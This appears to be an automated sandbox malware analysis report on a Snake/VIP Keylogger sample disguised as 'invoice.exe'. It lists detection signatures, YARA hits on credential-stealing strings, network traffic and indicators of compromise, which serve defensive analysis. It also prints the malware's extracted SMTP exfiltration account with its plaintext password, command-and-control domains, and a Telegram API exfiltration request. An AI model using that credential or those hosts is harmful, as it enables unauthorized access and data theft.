Edit tour

Windows Analysis Report
invoice.exe

Overview

General Information

Sample name:	invoice.exe
Analysis ID:	1523121
MD5:	69f5ec778e467c7d87f15b201c893816
SHA1:	4e2b63cce411847e95177765064b3fc03463590b
SHA256:	a433aa981a5cbfd5fae678c523b088d034f61f57dcb61232fbaba73657867b36
Tags:	exeMassLoggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

invoice.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\invoice.exe" MD5: 69F5EC778E467C7D87F15B201C893816)

invoice.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\invoice.exe" MD5: 69F5EC778E467C7D87F15B201C893816)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "itsupport@foxwagon-equipment.com", "Password": "SVBd8Gv^}!B1", "Host": "foxwagon-equipment.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "itsupport@foxwagon-equipment.com", "Password": "SVBd8Gv^}!B1", "Host": "foxwagon-equipment.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e3b2:$a1: get_encryptedPassword 0x2e94a:$a2: get_encryptedUsername 0x2e017:$a3: get_timePasswordChanged 0x2e13c:$a4: get_passwordField 0x2e3c8:$a5: set_encryptedPassword 0x31107:$a6: get_passwords 0x3149b:$a7: get_logins 0x310f3:$a8: GetOutlookPasswords 0x30aac:$a9: StartKeylogger 0x313f4:$a10: KeyLoggerEventArgs 0x30b4c:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ec0a:$a1: get_encryptedPassword 0x7262a:$a1: get_encryptedPassword 0xb5e4a:$a1: get_encryptedPassword 0x2f1a2:$a2: get_encryptedUsername 0x72bc2:$a2: get_encryptedUsername 0xb63e2:$a2: get_encryptedUsername 0x2e86f:$a3: get_timePasswordChanged 0x7228f:$a3: get_timePasswordChanged 0xb5aaf:$a3: get_timePasswordChanged 0x2e994:$a4: get_passwordField 0x723b4:$a4: get_passwordField 0xb5bd4:$a4: get_passwordField 0x2ec20:$a5: set_encryptedPassword 0x72640:$a5: set_encryptedPassword 0xb5e60:$a5: set_encryptedPassword 0x3195f:$a6: get_passwords 0x7537f:$a6: get_passwords 0xb8b9f:$a6: get_passwords 0x31cf3:$a7: get_logins 0x75713:$a7: get_logins 0xb8f33:$a7: get_logins
Process Memory Space: invoice.exe PID: 7496	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: invoice.exe PID: 7496	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: invoice.exe PID: 7496	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: invoice.exe PID: 7496	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: invoice.exe PID: 7496	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x21863:$a1: get_encryptedPassword 0x21df1:$a2: get_encryptedUsername 0x214d7:$a3: get_timePasswordChanged 0x215fc:$a4: get_passwordField 0x21879:$a5: set_encryptedPassword 0x24560:$a6: get_passwords 0x248f0:$a7: get_logins 0x2454c:$a8: GetOutlookPasswords 0x23f05:$a9: StartKeylogger 0x24849:$a10: KeyLoggerEventArgs 0x23fa5:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: invoice.exe PID: 7644	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: invoice.exe PID: 7644	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: invoice.exe PID: 7644	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: invoice.exe PID: 7644	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x67e63:$a1: get_encryptedPassword 0x683f1:$a2: get_encryptedUsername 0x67ad7:$a3: get_timePasswordChanged 0x67bfc:$a4: get_passwordField 0x67e79:$a5: set_encryptedPassword 0x6ab60:$a6: get_passwords 0x6aef0:$a7: get_logins 0x6ab4c:$a8: GetOutlookPasswords 0x6a505:$a9: StartKeylogger 0x6ae49:$a10: KeyLoggerEventArgs 0x6a5a5:$a11: KeyLoggerEventArgsEventHandler
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.invoice.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.invoice.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.invoice.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.invoice.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.invoice.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e5b2:$a1: get_encryptedPassword 0x2eb4a:$a2: get_encryptedUsername 0x2e217:$a3: get_timePasswordChanged 0x2e33c:$a4: get_passwordField 0x2e5c8:$a5: set_encryptedPassword 0x31307:$a6: get_passwords 0x3169b:$a7: get_logins 0x312f3:$a8: GetOutlookPasswords 0x30cac:$a9: StartKeylogger 0x315f4:$a10: KeyLoggerEventArgs 0x30d4c:$a11: KeyLoggerEventArgsEventHandler
2.2.invoice.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bc54:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b2f7:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b554:$a4: \Orbitum\User Data\Default\Login Data 0x3bf33:$a5: \Kometa\User Data\Default\Login Data
2.2.invoice.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f98c:$s1: UnHook 0x2f993:$s2: SetHook 0x2f99b:$s3: CallNextHook 0x2f9a8:$s4: _hook
0.2.invoice.exe.4ec7078.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.invoice.exe.4ec7078.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.invoice.exe.4ec7078.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.invoice.exe.4ec7078.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c7b2:$a1: get_encryptedPassword 0x2cd4a:$a2: get_encryptedUsername 0x2c417:$a3: get_timePasswordChanged 0x2c53c:$a4: get_passwordField 0x2c7c8:$a5: set_encryptedPassword 0x2f507:$a6: get_passwords 0x2f89b:$a7: get_logins 0x2f4f3:$a8: GetOutlookPasswords 0x2eeac:$a9: StartKeylogger 0x2f7f4:$a10: KeyLoggerEventArgs 0x2ef4c:$a11: KeyLoggerEventArgsEventHandler
0.2.invoice.exe.4ec7078.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39e54:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x394f7:$a3: \Google\Chrome\User Data\Default\Login Data 0x39754:$a4: \Orbitum\User Data\Default\Login Data 0x3a133:$a5: \Kometa\User Data\Default\Login Data
0.2.invoice.exe.4ec7078.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2db8c:$s1: UnHook 0x2db93:$s2: SetHook 0x2db9b:$s3: CallNextHook 0x2dba8:$s4: _hook
0.2.invoice.exe.4e83658.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.invoice.exe.4e83658.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.invoice.exe.4e83658.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.invoice.exe.4e83658.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c7b2:$a1: get_encryptedPassword 0x2cd4a:$a2: get_encryptedUsername 0x2c417:$a3: get_timePasswordChanged 0x2c53c:$a4: get_passwordField 0x2c7c8:$a5: set_encryptedPassword 0x2f507:$a6: get_passwords 0x2f89b:$a7: get_logins 0x2f4f3:$a8: GetOutlookPasswords 0x2eeac:$a9: StartKeylogger 0x2f7f4:$a10: KeyLoggerEventArgs 0x2ef4c:$a11: KeyLoggerEventArgsEventHandler
0.2.invoice.exe.4e83658.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39e54:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x394f7:$a3: \Google\Chrome\User Data\Default\Login Data 0x39754:$a4: \Orbitum\User Data\Default\Login Data 0x3a133:$a5: \Kometa\User Data\Default\Login Data
0.2.invoice.exe.4e83658.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2db8c:$s1: UnHook 0x2db93:$s2: SetHook 0x2db9b:$s3: CallNextHook 0x2dba8:$s4: _hook
0.2.invoice.exe.4e83658.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.invoice.exe.4e83658.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.invoice.exe.4e83658.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.invoice.exe.4e83658.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.invoice.exe.4e83658.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e5b2:$a1: get_encryptedPassword 0x71fd2:$a1: get_encryptedPassword 0xb57f2:$a1: get_encryptedPassword 0x2eb4a:$a2: get_encryptedUsername 0x7256a:$a2: get_encryptedUsername 0xb5d8a:$a2: get_encryptedUsername 0x2e217:$a3: get_timePasswordChanged 0x71c37:$a3: get_timePasswordChanged 0xb5457:$a3: get_timePasswordChanged 0x2e33c:$a4: get_passwordField 0x71d5c:$a4: get_passwordField 0xb557c:$a4: get_passwordField 0x2e5c8:$a5: set_encryptedPassword 0x71fe8:$a5: set_encryptedPassword 0xb5808:$a5: set_encryptedPassword 0x31307:$a6: get_passwords 0x74d27:$a6: get_passwords 0xb8547:$a6: get_passwords 0x3169b:$a7: get_logins 0x750bb:$a7: get_logins 0xb88db:$a7: get_logins
0.2.invoice.exe.4e83658.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bc54:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f674:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc2e94:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b2f7:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ed17:$a3: \Google\Chrome\User Data\Default\Login Data 0xc2537:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b554:$a4: \Orbitum\User Data\Default\Login Data 0x7ef74:$a4: \Orbitum\User Data\Default\Login Data 0xc2794:$a4: \Orbitum\User Data\Default\Login Data 0x3bf33:$a5: \Kometa\User Data\Default\Login Data 0x7f953:$a5: \Kometa\User Data\Default\Login Data 0xc3173:$a5: \Kometa\User Data\Default\Login Data
0.2.invoice.exe.4e83658.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f98c:$s1: UnHook 0x733ac:$s1: UnHook 0xb6bcc:$s1: UnHook 0x2f993:$s2: SetHook 0x733b3:$s2: SetHook 0xb6bd3:$s2: SetHook 0x2f99b:$s3: CallNextHook 0x733bb:$s3: CallNextHook 0xb6bdb:$s3: CallNextHook 0x2f9a8:$s4: _hook 0x733c8:$s4: _hook 0xb6be8:$s4: _hook
0.2.invoice.exe.4ec7078.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.invoice.exe.4ec7078.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.invoice.exe.4ec7078.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.invoice.exe.4ec7078.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.invoice.exe.4ec7078.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e5b2:$a1: get_encryptedPassword 0x71dd2:$a1: get_encryptedPassword 0x2eb4a:$a2: get_encryptedUsername 0x7236a:$a2: get_encryptedUsername 0x2e217:$a3: get_timePasswordChanged 0x71a37:$a3: get_timePasswordChanged 0x2e33c:$a4: get_passwordField 0x71b5c:$a4: get_passwordField 0x2e5c8:$a5: set_encryptedPassword 0x71de8:$a5: set_encryptedPassword 0x31307:$a6: get_passwords 0x74b27:$a6: get_passwords 0x3169b:$a7: get_logins 0x74ebb:$a7: get_logins 0x312f3:$a8: GetOutlookPasswords 0x74b13:$a8: GetOutlookPasswords 0x30cac:$a9: StartKeylogger 0x744cc:$a9: StartKeylogger 0x315f4:$a10: KeyLoggerEventArgs 0x74e14:$a10: KeyLoggerEventArgs 0x30d4c:$a11: KeyLoggerEventArgsEventHandler
0.2.invoice.exe.4ec7078.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bc54:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f474:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b2f7:$a3: \Google\Chrome\User Data\Default\Login Data 0x7eb17:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b554:$a4: \Orbitum\User Data\Default\Login Data 0x7ed74:$a4: \Orbitum\User Data\Default\Login Data 0x3bf33:$a5: \Kometa\User Data\Default\Login Data 0x7f753:$a5: \Kometa\User Data\Default\Login Data
0.2.invoice.exe.4ec7078.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f98c:$s1: UnHook 0x731ac:$s1: UnHook 0x2f993:$s2: SetHook 0x731b3:$s2: SetHook 0x2f99b:$s3: CallNextHook 0x731bb:$s3: CallNextHook 0x2f9a8:$s4: _hook 0x731c8:$s4: _hook
Click to see the 28 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 198.54.114.247, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\invoice.exe, Initiated: true, ProcessId: 7644, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49761

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T06:16:03.478306+0200	2803305	3	Unknown Traffic	192.168.2.4	49737	188.114.96.3	443	TCP
2024-10-01T06:16:07.494181+0200	2803305	3	Unknown Traffic	192.168.2.4	49745	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T06:16:01.972729+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	132.226.247.73	80	TCP
2024-10-01T06:16:02.894615+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	132.226.247.73	80	TCP
2024-10-01T06:16:04.285232+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "itsupport@foxwagon-equipment.com", "Password": "SVBd8Gv^}!B1", "Host": "foxwagon-equipment.com", "Port": "587", "Version": "4.4"}
Source: 0.2.invoice.exe.4e83658.1.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "itsupport@foxwagon-equipment.com", "Password": "SVBd8Gv^}!B1", "Host": "foxwagon-equipment.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: invoice.exe	ReversingLabs: Detection: 52%
Source: invoice.exe	Virustotal: Detection: 42%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: invoice.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.4:49745 -> 188.114.96.3:443 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2

Source: invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 0DCB0CBEh	0_2_0DCB0658
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 02F9F45Dh	2_2_02F9F2C0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 02F9F45Dh	2_2_02F9F4AC
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 02F9FC19h	2_2_02F9F960
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D49280h	2_2_05D48FB0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D47EB5h	2_2_05D47B78
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D418A1h	2_2_05D415F8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4C826h	2_2_05D4C558
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D40FF1h	2_2_05D40D48
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4E816h	2_2_05D4E548
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D40741h	2_2_05D40498
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D46733h	2_2_05D46488
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D43709h	2_2_05D43460
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4BF06h	2_2_05D4BC38
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4DEF6h	2_2_05D4DC28
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4DA66h	2_2_05D4D798
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D45A29h	2_2_05D45780
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4FA56h	2_2_05D4F788
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4BA76h	2_2_05D4B7A8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D42A01h	2_2_05D42758
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D479C9h	2_2_05D47720
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D45179h	2_2_05D44ED0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D42151h	2_2_05D41EA8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D47119h	2_2_05D46E70
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4D146h	2_2_05D4CE78
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4F136h	2_2_05D4EE68
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D448C9h	2_2_05D44620
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4ECA6h	2_2_05D4E9D8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4CCB6h	2_2_05D4C9E8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D41449h	2_2_05D411A0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4C396h	2_2_05D4C0C8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D40B99h	2_2_05D408F0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then mov esp, ebp	2_2_05D4B090
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then mov esp, ebp	2_2_05D4B081
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4E386h	2_2_05D4E0B8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D402E9h	2_2_05D40040
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D432B1h	2_2_05D43008
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D462D9h	2_2_05D46030
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D45E81h	2_2_05D45BD8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D42E59h	2_2_05D42BB0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4B5E6h	2_2_05D4B318
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D425A9h	2_2_05D42300
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4D5D6h	2_2_05D4D308
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D455D1h	2_2_05D45328
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D47571h	2_2_05D472C8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D4F5C6h	2_2_05D4F2F8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D41CF9h	2_2_05D41A50
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D44D21h	2_2_05D44A78
Source: C:\Users\user\Desktop\invoice.exe	Code function: 4x nop then jmp 05D46CC1h	2_2_05D46A18

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49761 -> 198.54.114.247:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2001/10/2024%20/%2011:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
